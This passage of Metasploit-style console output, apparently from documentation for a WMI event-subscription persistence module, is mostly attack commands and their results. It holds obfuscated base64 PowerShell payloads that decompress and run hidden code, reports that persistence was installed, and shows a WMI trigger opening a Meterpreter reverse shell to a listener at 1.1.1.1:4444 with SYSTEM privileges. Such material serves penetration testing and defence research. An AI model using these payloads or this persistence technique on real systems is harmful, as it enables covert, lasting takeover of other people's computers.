QBEAEQAZgA0ADYAWABXAE0AcwBDADMATABDADUARQBTAGcAbABKAEYAcQBNAE0ANQA1AHMAbwBkAEYAewAyAH0AaQBMAGsAOABtAFUAcABEAGkAbABFAFkARABaADQAaAB2AG0AZAAwAG8AWgBuAEUARwBxAGcAcgBtAHAATwBzAHAAcQBtAEMAMABmAEQAcgBsAG8ASABUADMAUQB0ADMATQB0AG8AVAA3AHcAQQBBAEEAQQA9AD0AJwApAC0AZgAnAGoAJwAsACcAKwAnACwAJwBlACcAKQApACkAKQAsAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApACkAKQA= -InputFormat None
[+] Cleaning up 6416
[+] EXECUTING:
powershell.exe -EncodedCommand JgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcASAA0AHMASQBBAE8AcgBrAEkAVwBrAEMAQQA0AHQAMgB6AFMAdgBMAEwATQByAFAAeQAwADMATgAnACsAJwBLADQAbQAxAHMAbgBKAFAATABVAEUAUwBDAEUAcwBzAHkAawB4AE0AeQBrAGsAdAAxAGwAQQBQAEwAVQA0AHQAVQB0AGYAVQB5ADAANgB0AEwASwA0AEoAVABzADEASgBUAFMAewAxAH0AUgBEAFMANABwAHkAcwB4AEwAVgA4AGcASQA5AGcAcAAwAEwAUQByAFAAcQAxAHsAMAB9AHQAagBrAFkAMQBMAEIAaQByAFkAUgBvAHEAOABUAG8AcQBlAGEAVQA1AE8AVABwAFEAUQAyAHMAQgB5ADkASABWAGsAbwBRACcAKwAnAEEAQQBBAEEAPQAnACkALQBmACcARwAnACwAJwA3ACcAKQApACkAKQAsAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApACkAKQBlAGMAaABvACAAJwBmAHcAawBFAEsARgBNAEIAJwA7AA== -InputFormat None
[+] Persistence installed!
[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/WIN10PROLICENSE_20251122.2931/WIN10PROLICENSE_20251122.2931.rc
```

Persistence Execution

```
msf exploit(windows/persistence/wmi/wmi_event_subscription_process) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > execute -f calc.exe
Process 7596 created.
meterpreter > 
[*] Sending stage (188998 bytes) to 2.2.2.2
[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:49759) at 2025-11-22 11:30:10 -0500

meterpreter > background
[*] Backgrounding session 1...
smsf exploit(windows/persistence/wmi/wmi_event_subscription_process) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > background
[*] Backgrounding session 2...
msf exploit(windows/persistence/wmi/wmi_event_subscription_process) > 
```
